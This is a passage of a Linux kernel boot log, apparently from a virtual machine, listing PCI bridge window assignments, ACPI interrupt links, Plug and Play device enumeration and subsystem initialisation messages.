0xc0000000-0xfebfffff] (subtractive decode) 109 | [ 3.283773] pci 0000:00:11.0: bridge window [io 0x0000-0x0cf7] (subtractive decode) 110 | [ 3.283780] pci 0000:00:11.0: bridge window [io 0x0d00-0xfeff] (subtractive decode) 111 | [ 3.284648] pci 0000:00:15.0: PCI bridge to [bus 03] 112 | [ 3.284685] pci 0000:00:15.0: bridge window [io 0x4000-0x4fff] 113 | [ 3.284718] pci 0000:00:15.0: bridge window [mem 0xca400000-0xca4fffff] 114 | [ 3.284773] pci 0000:00:15.0: bridge window [mem 0xd8a00000-0xd8afffff 64bit pref] 115 | [ 3.318823] pci 0000:00:15.1: PCI bridge to [bus 04] 116 | [ 3.318860] pci 0000:00:15.1: bridge window [io 0x8000-0x8fff] 117 | [ 3.318893] pci 0000:00:15.1: bridge window [mem 0xca800000-0xca8fffff] 118 | [ 3.318947] pci 0000:00:15.1: bridge window [mem 0xd8e00000-0xd8efffff 64bit pref] 119 | [ 3.319561] pci 0000:00:15.2: PCI bridge to [bus 05] 120 | [ 3.319597] pci 0000:00:15.2: bridge window [io 0xc000-0xcfff] 121 | [ 3.319629] pci 0000:00:15.2: bridge window [mem 0xcac00000-0xcacfffff] 122 | [ 3.319684] pci 0000:00:15.2: bridge window [mem 0xd9200000-0xd92fffff 64bit pref] 123 | [ 3.331704] pci 0000:00:15.3: PCI bridge to [bus 06] 124 | [ 3.331762] pci 0000:00:15.3: bridge window [mem 0xcb000000-0xcb0fffff] 125 | [ 3.334126] pci 0000:00:15.3: bridge window [mem 0xd9600000-0xd96fffff 64bit pref] 126 | [ 3.334836] pci 0000:00:15.4: PCI bridge to [bus 07] 127 | [ 3.334895] pci 0000:00:15.4: bridge window [mem 0xcb400000-0xcb4fffff] 128 | [ 3.334950] pci 0000:00:15.4: bridge window [mem 0xd9a00000-0xd9afffff 64bit pref] 129 | [ 3.368914] pci 0000:00:15.5: PCI bridge to [bus 08] 130 | [ 3.369038] pci 0000:00:15.5: bridge window [mem 0xcb800000-0xcb8fffff] 131 | [ 3.369093] pci 0000:00:15.5: bridge window [mem 0xd9e00000-0xd9efffff 64bit pref] 132 | [ 3.369919] pci 0000:00:15.6: PCI bridge to [bus 09] 133 | [ 3.369989] pci 0000:00:15.6: bridge window [mem 0xcbc00000-0xcbcfffff] 134 | [ 3.370044] pci 0000:00:15.6: bridge window [mem 0xda200000-0xda2fffff 64bit pref] 135 | [ 3.371203] pci 0000:00:15.7: PCI bridge to [bus 0a] 136 | [ 3.371308] pci 0000:00:15.7: bridge window [mem 0xcc000000-0xcc0fffff] 137 | [ 3.371383] pci 0000:00:15.7: bridge window [mem 0xda600000-0xda6fffff 64bit pref] 138 | [ 3.372620] pci 0000:00:16.0: PCI bridge to [bus 0b] 139 | [ 3.372656] pci 0000:00:16.0: bridge window [io 0x5000-0x5fff] 140 | [ 3.372689] pci 0000:00:16.0: bridge window [mem 0xca500000-0xca5fffff] 141 | [ 3.372743] pci 0000:00:16.0: bridge window [mem 0xd8b00000-0xd8bfffff 64bit pref] 142 | [ 3.373304] pci 0000:00:16.1: PCI bridge to [bus 0c] 143 | [ 3.373337] pci 0000:00:16.1: bridge window [io 0x9000-0x9fff] 144 | [ 3.373409] pci 0000:00:16.1: bridge window [mem 0xca900000-0xca9fffff] 145 | [ 3.373464] pci 0000:00:16.1: bridge window [mem 0xd8f00000-0xd8ffffff 64bit pref] 146 | [ 3.374005] pci 0000:00:16.2: PCI bridge to [bus 0d] 147 | [ 3.374038] pci 0000:00:16.2: bridge window [io 0xd000-0xdfff] 148 | [ 3.374071] pci 0000:00:16.2: bridge window [mem 0xcad00000-0xcadfffff] 149 | [ 3.374125] pci 0000:00:16.2: bridge window [mem 0xd9300000-0xd93fffff 64bit pref] 150 | [ 3.374723] pci 0000:00:16.3: PCI bridge to [bus 0e] 151 | [ 3.374779] pci 0000:00:16.3: bridge window [mem 0xcb100000-0xcb1fffff] 152 | [ 3.374833] pci 0000:00:16.3: bridge window [mem 0xd9700000-0xd97fffff 64bit pref] 153 | [ 3.375470] pci 0000:00:16.4: PCI bridge to [bus 0f] 154 | [ 3.375528] pci 0000:00:16.4: bridge window [mem 0xcb500000-0xcb5fffff] 155 | [ 3.375582] pci 0000:00:16.4: bridge window [mem 0xd9b00000-0xd9bfffff 64bit pref] 156 | [ 3.377793] pci 0000:00:16.5: PCI bridge to [bus 10] 157 | [ 3.377855] pci 0000:00:16.5: bridge window [mem 0xcb900000-0xcb9fffff] 158 | [ 3.377910] pci 0000:00:16.5: bridge window [mem 0xd9f00000-0xd9ffffff 64bit pref] 159 | [ 3.378595] pci 0000:00:16.6: PCI bridge to [bus 11] 160 | [ 3.378653] pci 0000:00:16.6: bridge window [mem 0xcbd00000-0xcbdfffff] 161 | [ 3.378721] pci 0000:00:16.6: bridge window [mem 0xda300000-0xda3fffff 64bit pref] 162 | [ 3.379528] pci 0000:00:16.7: PCI bridge to [bus 12] 163 | [ 3.379588] pci 0000:00:16.7: bridge window [mem 0xcc100000-0xcc1fffff] 164 | [ 3.379645] pci 0000:00:16.7: bridge window [mem 0xda700000-0xda7fffff 64bit pref] 165 | [ 3.380267] pci 0000:00:17.0: PCI bridge to [bus 13] 166 | [ 3.380300] pci 0000:00:17.0: bridge window [io 0x6000-0x6fff] 167 | [ 3.380333] pci 0000:00:17.0: bridge window [mem 0xca600000-0xca6fffff] 168 | [ 3.380454] pci 0000:00:17.0: bridge window [mem 0xd8c00000-0xd8cfffff 64bit pref] 169 | [ 3.381000] pci 0000:00:17.1: PCI bridge to [bus 14] 170 | [ 3.381033] pci 0000:00:17.1: bridge window [io 0xa000-0xafff] 171 | [ 3.381065] pci 0000:00:17.1: bridge window [mem 0xcaa00000-0xcaafffff] 172 | [ 3.381119] pci 0000:00:17.1: bridge window [mem 0xd9000000-0xd90fffff 64bit pref] 173 | [ 3.381664] pci 0000:00:17.2: PCI bridge to [bus 15] 174 | [ 3.381697] pci 0000:00:17.2: bridge window [io 0xe000-0xefff] 175 | [ 3.381729] pci 0000:00:17.2: bridge window [mem 0xcae00000-0xcaefffff] 176 | [ 3.381783] pci 0000:00:17.2: bridge window [mem 0xd9400000-0xd94fffff 64bit pref] 177 | [ 3.382318] pci 0000:00:17.3: PCI bridge to [bus 16] 178 | [ 3.382437] pci 0000:00:17.3: bridge window [mem 0xcb200000-0xcb2fffff] 179 | [ 3.382491] pci 0000:00:17.3: bridge window [mem 0xd9800000-0xd98fffff 64bit pref] 180 | [ 3.383159] pci 0000:00:17.4: PCI bridge to [bus 17] 181 | [ 3.383215] pci 0000:00:17.4: bridge window [mem 0xcb600000-0xcb6fffff] 182 | [ 3.383270] pci 0000:00:17.4: bridge window [mem 0xd9c00000-0xd9cfffff 64bit pref] 183 | [ 3.383963] pci 0000:00:17.5: PCI bridge to [bus 18] 184 | [ 3.384019] pci 0000:00:17.5: bridge window [mem 0xcba00000-0xcbafffff] 185 | [ 3.384073] pci 0000:00:17.5: bridge window [mem 0xda000000-0xda0fffff 64bit pref] 186 | [ 3.384640] pci 0000:00:17.6: PCI bridge to [bus 19] 187 | [ 3.384695] pci 0000:00:17.6: bridge window [mem 0xcbe00000-0xcbefffff] 188 | [ 3.384749] pci 0000:00:17.6: bridge window [mem 0xda400000-0xda4fffff 64bit pref] 189 | [ 3.385287] pci 0000:00:17.7: PCI bridge to [bus 1a] 190 | [ 3.418647] pci 0000:00:17.7: bridge window [mem 0xcc200000-0xcc2fffff] 191 | [ 3.418703] pci 0000:00:17.7: bridge window [mem 0xda800000-0xda8fffff 64bit pref] 192 | [ 3.419255] pci 0000:00:18.0: PCI bridge to [bus 1b] 193 | [ 3.419289] pci 0000:00:18.0: bridge window [io 0x7000-0x7fff] 194 | [ 3.419321] pci 0000:00:18.0: bridge window [mem 0xca700000-0xca7fffff] 195 | [ 3.419374] pci 0000:00:18.0: bridge window [mem 0xd8d00000-0xd8dfffff 64bit pref] 196 | [ 3.420003] pci 0000:00:18.1: PCI bridge to [bus 1c] 197 | [ 3.420037] pci 0000:00:18.1: bridge window [io 0xb000-0xbfff] 198 | [ 3.420078] pci 0000:00:18.1: bridge window [mem 0xcab00000-0xcabfffff] 199 | [ 3.420133] pci 0000:00:18.1: bridge window [mem 0xd9100000-0xd91fffff 64bit pref] 200 | [ 3.420684] pci 0000:00:18.2: PCI bridge to [bus 1d] 201 | [ 3.420717] pci 0000:00:18.2: bridge window [io 0xf000-0xffff] 202 | [ 3.420750] pci 0000:00:18.2: bridge window [mem 0xcaf00000-0xcaffffff] 203 | [ 3.420804] pci 0000:00:18.2: bridge window [mem 0xd9500000-0xd95fffff 64bit pref] 204 | [ 3.421339] pci 0000:00:18.3: PCI bridge to [bus 1e] 205 | [ 3.421392] pci 0000:00:18.3: bridge window [mem 0xcb300000-0xcb3fffff] 206 | [ 3.421446] pci 0000:00:18.3: bridge window [mem 0xd9900000-0xd99fffff 64bit pref] 207 | [ 3.421987] pci 0000:00:18.4: PCI bridge to [bus 1f] 208 | [ 3.422042] pci 0000:00:18.4: bridge window [mem 0xcb700000-0xcb7fffff] 209 | [ 3.422096] pci 0000:00:18.4: bridge window [mem 0xd9d00000-0xd9dfffff 64bit pref] 210 | [ 3.422642] pci 0000:00:18.5: PCI bridge to [bus 20] 211 | [ 3.422697] pci 0000:00:18.5: bridge window [mem 0xcbb00000-0xcbbfffff] 212 | [ 3.422751] pci 0000:00:18.5: bridge window [mem 0xda100000-0xda1fffff 64bit pref] 213 | [ 3.423286] pci 0000:00:18.6: PCI bridge to [bus 21] 214 | [ 3.423340] pci 0000:00:18.6: bridge window [mem 0xcbf00000-0xcbffffff] 215 | [ 3.423394] pci 0000:00:18.6: bridge window [mem 0xda500000-0xda5fffff 64bit pref] 216 | [ 3.424003] pci 0000:00:18.7: PCI bridge to [bus 22] 217 | [ 3.424061] pci 0000:00:18.7: bridge window [mem 0xcc300000-0xcc3fffff] 218 | [ 3.424118] pci 0000:00:18.7: bridge window [mem 0xda900000-0xda9fffff 64bit pref] 219 | [ 3.428500] pci_bus 0000:00: on NUMA node 0 220 | [ 3.430532] pci0000:00: Requesting ACPI _OSC control (0x1d) 221 | [ 3.431327] pci0000:00: ACPI _OSC control (0x15) granted 222 | [ 3.478929] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 *9 10 11 14 15) 223 | [ 3.479315] ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 9 10 *11 14 15) 224 | [ 3.479458] ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 9 *10 11 14 15) 225 | [ 3.479598] ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 *5 6 7 9 10 11 14 15) 226 | [ 3.483867] vgaarb: device added: PCI:0000:00:0f.0,decodes=io+mem,owns=io+mem,locks=none 227 | [ 3.483951] vgaarb: loaded 228 | [ 3.483989] vgaarb: bridge control possible 0000:00:0f.0 229 | [ 3.520072] SCSI subsystem initialized 230 | [ 3.520212] ACPI: bus type scsi registered 231 | [ 3.522350] libata version 3.00 loaded. 232 | [ 3.522783] ACPI: bus type usb registered 233 | [ 3.523330] usbcore: registered new interface driver usbfs 234 | [ 3.523625] usbcore: registered new interface driver hub 235 | [ 3.523858] usbcore: registered new device driver usb 236 | [ 3.526842] PCI: Using ACPI for IRQ routing 237 | [ 3.879628] PCI: pci_cache_line_size set to 64 bytes 238 | [ 3.879878] pci 0000:00:18.2: no compatible bridge window for [io 0xf000-0xffff] 239 | [ 3.881484] e820: reserve RAM buffer [mem 0x0009f000-0x0009ffff] 240 | [ 3.881718] e820: reserve RAM buffer [mem 0x3fee0000-0x3fffffff] 241 | [ 3.923644] NetLabel: Initializing 242 | [ 3.923671] NetLabel: domain hash size = 128 243 | [ 3.923690] NetLabel: protocols = UNLABELED CIPSOv4 244 | [ 3.924972] NetLabel: unlabeled traffic allowed by default 245 | [ 3.927923] HPET: 16 timers in total, 0 timers will be used for per-cpu timer 246 | [ 3.928918] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 247 | [ 3.929077] hpet0: 16 comparators, 64-bit 14.318180 MHz counter 248 | [ 3.968058] Switching to clocksource hpet 249 | [ 4.270105] AppArmor: AppArmor Filesystem Enabled 250 | [ 4.271191] pnp: PnP ACPI init 251 | [ 4.271352] ACPI: bus type pnp registered 252 | [ 4.273964] system 00:00: [io 0x1000-0x103f] has been reserved 253 | [ 4.273988] system 00:00: [io 0x1040-0x104f] has been reserved 254 | [ 4.273997] system 00:00: [io 0x0cf0-0x0cf1] has been reserved 255 | [ 4.274157] system 00:00: Plug and Play ACPI device, IDs PNP0c02 (active) 256 | [ 4.274481] pnp 00:01: [dma 4] 257 | [ 4.274575] pnp 00:01: Plug and Play ACPI device, IDs PNP0200 (active) 258 | [ 4.274726] pnp 00:02: Plug and Play ACPI device, IDs PNP0001 (active) 259 | [ 4.279026] pnp 00:03: Plug and Play ACPI device, IDs PNP0b00 (active) 260 | [ 4.279264] pnp 00:04: Plug and Play ACPI device, IDs PNP0800 (active) 261 | [ 4.279342] pnp 00:05: Plug and Play ACPI device, IDs PNP0303 (active) 262 | [ 4.279406] pnp 00:06: Plug and Play ACPI device, IDs PNP0f13 (active) 263 | [ 4.280538] system 00:07: [mem 0xfed00000-0xfed003ff] has been reserved 264 | [ 4.280577] system 00:07: Plug and Play ACPI device, IDs PNP0103 PNP0c01 (active) 265 | [ 4.376742] pnp 00:08: Plug and Play ACPI device, IDs PNP0400 (active) 266 | [ 4.433872] pnp 00:09: Plug and Play ACPI device, IDs PNP0501 (active) 267 | [ 4.522094] pnp 00:0a: Plug and Play ACPI device, IDs PNP0501 (active) 268 | [ 4.618209] pnp 00:0b: [dma 2] 269 | [ 4.623761] pnp 00:0b: Plug and Play ACPI device, IDs PNP0700 (active) 270 | [ 4.626648] system 00:0c: [io 0x1060-0x107f] has been reserved 271 | [ 4.627210] system 00:0c: [mem 0xe0000000-0xefffffff] has been reserved 272 | [ 4.627225] system 00:0c: [mem 0xc8200000-0xc83fffff] has been reserved 273 | [ 4.627247] system 00:0c: Plug and Play ACPI device, IDs PNP0c02 (active) 274 | [ 4.681251] pnp: PnP ACPI: found 13 devices 275 | [ 4.681347] ACPI: ACPI bus type pnp unregistered 276 | [ 4.681449] PnPBIOS: Disabled by ACPI PNP 277 | [ 4.763454] pci 0000:00:15.3: bridge window [io 0x1000-0x0fff] to [bus 06] add_size 1000 278 | [ 4.763499] pci 0000:00:15.4: bridge window [io 0x1000-0x0fff] to [bus 07] add_size 1000 279 | [ 4.763544] pci 0000:00:15.5: bridge window [io 0x1000-0x0fff] to [bus 08] add_size 1000 280 | [ 4.763589] pci 0000:00:15.6: bridge window [io 0x1000-0x0fff] to [bus 09] add_size 1000 281 | [ 4.763634] pci 0000:00:15.7: bridge window [io 0x1000-0x0fff] to [bus 0a] add_size 1000 282 | [ 4.763679] pci 0000:00:16.3: bridge window [io 0x1000-0x0fff] to [bus 0e] add_size 1000 283 | [ 4.763724] pci 0000:00:16.4: bridge window [io 0x1000-0x0fff] to [bus 0f] add_size 1000 284 | [ 4.763769] pci 0000:00:16.5: bridge window [io 0x1000-0x0fff] to [bus 10] add_size 1000 285 | [ 4.763814] pci 0000:00:16.6: bridge window [io 0x1000-0x0fff] to [bus 11] add_size 1000 286 | [ 4.763859] pci 0000:00:16.7: bridge window [io 0x1000-0x0fff] to [bus 12] add_size 1000 287 | [ 4.763904] pci 0000:00:17.3: bridge window [io 0x1000-0x0fff] to [bus 16] add_size 1000 288 | [ 4.763949] pci 0000:00:17.4: bridge window [io 0x1000-0x0fff] to [bus 17] add_size 1000 289 | [ 4.763994] pci 0000:00:17.5: bridge window [io 0x1000-0x0fff] to [bus 18] add_size 1000 290 | [ 4.764039] pci 0000:00:17.6: bridge window [io 0x1000-0x0fff] to [bus 19] add_size 1000 291 | [ 4.764084] pci 0000:00:17.7: bridge window [io 0x1000-0x0fff] to [bus 1a] add_size 1000 292 | [ 4.764129] pci 0000:00:18.2: bridge window [io 0x1000-0x0fff] to [bus 1d] add_size 1000 293 | [ 4.764175] pci 0000:00:18.3: bridge window [io 0x1000-0x0fff] to [bus 1e] add_size 1000 294 | [ 4.764220] pci 0000:00:18.4: bridge window [io 0x1000-0x0fff] to [bus 1f] add_size 1000 295 | [ 4.764265] pci 0000:00:18.5: bridge window [io 0x1000-0x0fff] to [bus 20] add_size 1000 296 | [ 4.764310] pci 0000:00:18.6: bridge window [io 0x1000-0x0fff] to [bus 21] add_size 1000 297 | [ 4.764355] pci 0000:00:18.7: bridge window [io 0x1000-0x0fff] to [bus 22] add_size 1000 298 | [ 4.764400] pci 0000:00:15.3: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 299 | [ 4.764445] pci 0000:00:15.4: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 300 | [ 4.764457] pci 0000:00:15.5: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 301 | [ 4.764466] pci 0000:00:15.6: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 302 | [ 4.764475] pci 0000:00:15.7: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 303 | [ 4.764483] pci 0000:00:16.3: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 304 | [ 4.764492] pci 0000:00:16.4: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 305 | [ 4.764501] pci 0000:00:16.5: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 306 | [ 4.764509] pci 0000:00:16.6: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 307 | [ 4.764518] pci 0000:00:16.7: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 308 | [ 4.764526] pci 0000:00:17.3: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 309 | [ 4.764535] pci 0000:00:17.4: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 310 | [ 4.764544] pci 0000:00:17.5: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 311 | [ 4.764552] pci 0000:00:17.6: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 312 | [ 4.764561] pci 0000:00:17.7: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 313 | [ 4.764569] pci 0000:00:18.2: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 314 | [ 4.764578] pci 0000:00:18.3: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 315 | [ 4.764586] pci 0000:00:18.4: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 316 | [ 4.764595] pci 0000:00:18.5: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 317 | [ 4.764603] pci 0000:00:18.6: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 318 | [ 4.764621] pci 0000:00:18.7: res[13]=[io 0x1000-0x0fff] get_res_add_size add_size 1000 319 | [ 4.764666] pci 0000:00:0f.0: BAR 6: assigned [mem 0xc0000000-0xc0007fff pref] 320 | [ 4.764711] pci 0000:00:10.0: BAR 6: assigned [mem 0xc0008000-0xc000bfff pref] 321 | [ 4.764756] pci 0000:00:15.3: BAR 13: can't assign io (size 0x1000) 322 | [ 4.764801] pci 0000:00:15.4: BAR 13: can't assign io (size 0x1000) 323 | [ 4.764813] pci 0000:00:15.5: BAR 13: can't assign io (size 0x1000) 324 | [ 4.764823] pci 0000:00:15.6: BAR 13: can't assign io (size 0x1000) 325 | [ 4.764833] pci 0000:00:15.7: BAR 13: can't assign io (size 0x1000) 326 | [ 4.764843] pci 0000:00:16.3: BAR 13: can't assign io (size 0x1000) 327 | [ 4.764854] pci 0000:00:16.4: BAR 13: can't assign io (size 0x1000) 328 | [ 4.764864] pci 0000:00:16.5: BAR 13: can't assign io (size 0x1000) 329 | [ 4.764874] pci 0000:00:16.6: BAR 13: can't assign io (size 0x1000) 330 | [ 4.764884] pci 0000:00:16.7: BAR 13: can't assign io (size 0x1000) 331 | [ 4.764894] pci 0000:00:17.3: BAR 13: can't assign io (size 0x1000) 332 | [ 4.764904] pci 0000:00:17.4: BAR 13: can't assign io (size 0x1000) 333 | [ 4.764914] pci 0000:00:17.5: BAR 13: can't assign io (size 0x1000) 334 | [ 4.764924] pci 0000:00:17.6: BAR 13: can't assign io (size 0x1000) 335 | [ 4.764934] pci 0000:00:17.7: BAR 13: can't assign io (size 0x1000) 336 | [ 4.764944] pci 0000:00:18.2: BAR 13: can't assign io (size 0x1000) 337 | [ 4.764954] pci 0000:00:18.3: BAR 13: can't assign io (size 0x1000) 338 | [ 4.764964] pci 0000:00:18.4: BAR 13: can't assign io (size 0x1000) 339 | [ 4.764975] pci 0000:00:18.5: BAR 13: can't assign io (size 0x1000) 340 | [ 4.764985] pci 0000:00:18.6: BAR 13: can't assign io (size 0x1000) 341 | [ 4.764995] pci 0000:00:18.7: BAR 13: can't assign io (size 0x1000) 342 | [ 4.767425] pci 0000:00:01.0: PCI bridge to [bus 01] 343 | [ 4.767470] pci 0000:02:01.0: BAR 6: assigned [mem 0xd8400000-0xd840ffff pref] 344 | [ 4.767497] pci 0000:00:11.0: PCI bridge to [bus 02] 345 | [ 4.767542] pci 0000:00:11.0: bridge window [io 0x2000-0x3fff] 346 | [ 4.767587] pci 0000:00:11.0: bridge window [mem 0xc9000000-0xca3fffff] 347 | [ 4.767633] pci 0000:00:11.0: bridge window [mem 0xd8400000-0xd89fffff 64bit pref] 348 | [ 4.767678] pci 0000:00:15.0: PCI bridge to [bus 03] 349 | [ 4.767702] pci 0000:00:15.0: bridge window [io 0x4000-0x4fff] 350 | [ 4.767745] pci 0000:00:15.0: bridge window [mem 0xca400000-0xca4fffff] 351 | [ 4.767778] pci 0000:00:15.0: bridge window [mem 0xd8a00000-0xd8afffff 64bit pref] 352 | [ 4.767823] pci 0000:00:15.1: PCI bridge to [bus 04] 353 | [ 4.767847] pci 0000:00:15.1: bridge window [io 0x8000-0x8fff] 354 | [ 4.767892] pci 0000:00:15.1: bridge window [mem 0xca800000-0xca8fffff] 355 | [ 4.767926] pci 0000:00:15.1: bridge window [mem 0xd8e00000-0xd8efffff 64bit pref] 356 | [ 4.767971] pci 0000:00:15.2: PCI bridge to [bus 05] 357 | [ 4.767994] pci 0000:00:15.2: bridge window [io 0xc000-0xcfff] 358 | [ 4.768037] pci 0000:00:15.2: bridge window [mem 0xcac00000-0xcacfffff] 359 | [ 4.768070] pci 0000:00:15.2: bridge window [mem 0xd9200000-0xd92fffff 64bit pref] 360 | [ 4.768115] pci 0000:00:15.3: PCI bridge to [bus 06] 361 | [ 4.768160] pci 0000:00:15.3: bridge window [mem 0xcb000000-0xcb0fffff] 362 | [ 4.768193] pci 0000:00:15.3: bridge window [mem 0xd9600000-0xd96fffff 64bit pref] 363 | [ 4.768238] pci 0000:00:15.4: PCI bridge to [bus 07] 364 | [ 4.768283] pci 0000:00:15.4: bridge window [mem 0xcb400000-0xcb4fffff] 365 | [ 4.768316] pci 0000:00:15.4: bridge window [mem 0xd9a00000-0xd9afffff 64bit pref] 366 | [ 4.768361] pci 0000:00:15.5: PCI bridge to [bus 08] 367 | [ 4.768404] pci 0000:00:15.5: bridge window [mem 0xcb800000-0xcb8fffff] 368 | [ 4.768437] pci 0000:00:15.5: bridge window [mem 0xd9e00000-0xd9efffff 64bit pref] 369 | [ 4.768482] pci 0000:00:15.6: PCI bridge to [bus 09] 370 | [ 4.768527] pci 0000:00:15.6: bridge window [mem 0xcbc00000-0xcbcfffff] 371 | [ 4.768559] pci 0000:00:15.6: bridge window [mem 0xda200000-0xda2fffff 64bit pref] 372 | [ 4.768604] pci 0000:00:15.7: PCI bridge to [bus 0a] 373 | [ 4.768649] pci 0000:00:15.7: bridge window [mem 0xcc000000-0xcc0fffff] 374 | [ 4.768682] pci 0000:00:15.7: bridge window [mem 0xda600000-0xda6fffff 64bit pref] 375 | [ 4.768727] pci 0000:00:16.0: PCI bridge to [bus 0b] 376 | [ 4.768751] pci 0000:00:16.0: bridge window [io 0x5000-0x5fff] 377 | [ 4.768794] pci 0000:00:16.0: bridge window [mem 0xca500000-0xca5fffff] 378 | [ 4.768826] pci 0000:00:16.0: bridge window [mem 0xd8b00000-0xd8bfffff 64bit pref] 379 | [ 4.768871] pci 0000:00:16.1: PCI bridge to [bus 0c] 380 | [ 4.768894] pci 0000:00:16.1: bridge window [io 0x9000-0x9fff] 381 | [ 4.768936] pci 0000:00:16.1: bridge window [mem 0xca900000-0xca9fffff] 382 | [ 4.768969] pci 0000:00:16.1: bridge window [mem 0xd8f00000-0xd8ffffff 64bit pref] 383 | [ 4.769014] pci 0000:00:16.2: PCI bridge to [bus 0d] 384 | [ 4.769038] pci 0000:00:16.2: bridge window [io 0xd000-0xdfff] 385 | [ 4.769082] pci 0000:00:16.2: bridge window [mem 0xcad00000-0xcadfffff] 386 | [ 4.769114] pci 0000:00:16.2: bridge window [mem 0xd9300000-0xd93fffff 64bit pref] 387 | [ 4.769159] pci 0000:00:16.3: PCI bridge to [bus 0e] 388 | [ 4.769204] pci 0000:00:16.3: bridge window [mem 0xcb100000-0xcb1fffff] 389 | [ 4.769237] pci 0000:00:16.3: bridge window [mem 0xd9700000-0xd97fffff 64bit pref] 390 | [ 4.769282] pci 0000:00:16.4: PCI bridge to [bus 0f] 391 | [ 4.769327] pci 0000:00:16.4: bridge window [mem 0xcb500000-0xcb5fffff] 392 | [ 4.769360] pci 0000:00:16.4: bridge window [mem 0xd9b00000-0xd9bfffff 64bit pref] 393 | [ 4.769405] pci 0000:00:16.5: PCI bridge to [bus 10] 394 | [ 4.769449] pci 0000:00:16.5: bridge window [mem 0xcb900000-0xcb9fffff] 395 | [ 4.769492] pci 0000:00:16.5: bridge window [mem 0xd9f00000-0xd9ffffff 64bit pref] 396 | [ 4.769537] pci 0000:00:16.6: PCI bridge to [bus 11] 397 | [ 4.769582] pci 0000:00:16.6: bridge window [mem 0xcbd00000-0xcbdfffff] 398 | [ 4.769614] pci 0000:00:16.6: bridge window [mem 0xda300000-0xda3fffff 64bit pref] 399 | [ 4.769659] pci 0000:00:16.7: PCI bridge to [bus 12] 400 | [ 4.769704] pci 0000:00:16.7: bridge window [mem 0xcc100000-0xcc1fffff] 401 | [ 4.769736] pci 0000:00:16.7: bridge window [mem 0xda700000-0xda7fffff 64bit pref] 402 | [ 4.769781] pci 0000:00:17.0: PCI bridge to [bus 13] 403 | [ 4.769804] pci 0000:00:17.0: bridge window [io 0x6000-0x6fff] 404 | [ 4.769847] pci 0000:00:17.0: bridge window [mem 0xca600000-0xca6fffff] 405 | [ 4.769879] pci 0000:00:17.0: bridge window [mem 0xd8c00000-0xd8cfffff 64bit pref] 406 | [ 4.769925] pci 0000:00:17.1: PCI bridge to [bus 14] 407 | [ 4.769947] pci 0000:00:17.1: bridge window [io 0xa000-0xafff] 408 | [ 4.769990] pci 0000:00:17.1: bridge window [mem 0xcaa00000-0xcaafffff] 409 | [ 4.770022] pci 0000:00:17.1: bridge window [mem 0xd9000000-0xd90fffff 64bit pref] 410 | [ 4.770067] pci 0000:00:17.2: PCI bridge to [bus 15] 411 | [ 4.770090] pci 0000:00:17.2: bridge window [io 0xe000-0xefff] 412 | [ 4.770132] pci 0000:00:17.2: bridge window [mem 0xcae00000-0xcaefffff] 413 | [ 4.770165] pci 0000:00:17.2: bridge window [mem 0xd9400000-0xd94fffff 64bit pref] 414 | [ 4.770210] pci 0000:00:17.3: PCI bridge to [bus 16] 415 | [ 4.770254] pci 0000:00:17.3: bridge window [mem 0xcb200000-0xcb2fffff] 416 | [ 4.770286] pci 0000:00:17.3: bridge window [mem 0xd9800000-0xd98fffff 64bit pref] 417 | [ 4.771357] pci 0000:00:17.4: PCI bridge to [bus 17] 418 | [ 4.771424] pci 0000:00:17.4: bridge window [mem 0xcb600000-0xcb6fffff] 419 | [ 4.771459] pci 0000:00:17.4: bridge window [mem 0xd9c00000-0xd9cfffff 64bit pref] 420 | [ 4.771504] pci 0000:00:17.5: PCI bridge to [bus 18] 421 | [ 4.771548] pci 0000:00:17.5: bridge window [mem 0xcba00000-0xcbafffff] 422 | [ 4.771581] pci 0000:00:17.5: bridge window [mem 0xda000000-0xda0fffff 64bit pref] 423 | [ 4.771626] pci 0000:00:17.6: PCI bridge to [bus 19] 424 | [ 4.771671] pci 0000:00:17.6: bridge window [mem 0xcbe00000-0xcbefffff] 425 | [ 4.771704] pci 0000:00:17.6: bridge window [mem 0xda400000-0xda4fffff 64bit pref] 426 | [ 4.771749] pci 0000:00:17.7: PCI bridge to [bus 1a] 427 | [ 4.771794] pci 0000:00:17.7: bridge window [mem 0xcc200000-0xcc2fffff] 428 | [ 4.771828] pci 0000:00:17.7: bridge window [mem 0xda800000-0xda8fffff 64bit pref] 429 | [ 4.771873] pci 0000:00:18.0: PCI bridge to [bus 1b] 430 | [ 4.771898] pci 0000:00:18.0: bridge window [io 0x7000-0x7fff] 431 | [ 4.771942] pci 0000:00:18.0: bridge window [mem 0xca700000-0xca7fffff] 432 | [ 4.771976] pci 0000:00:18.0: bridge window [mem 0xd8d00000-0xd8dfffff 64bit pref] 433 | [ 4.772021] pci 0000:00:18.1: PCI bridge to [bus 1c] 434 | [ 4.772046] pci 0000:00:18.1: bridge window [io 0xb000-0xbfff] 435 | [ 4.772089] pci 0000:00:18.1: bridge window [mem 0xcab00000-0xcabfffff] 436 | [ 4.772123] pci 0000:00:18.1: bridge window [mem 0xd9100000-0xd91fffff 64bit pref] 437 | [ 4.772168] pci 0000:00:18.2: PCI bridge to [bus 1d] 438 | [ 4.772213] pci 0000:00:18.2: bridge window [mem 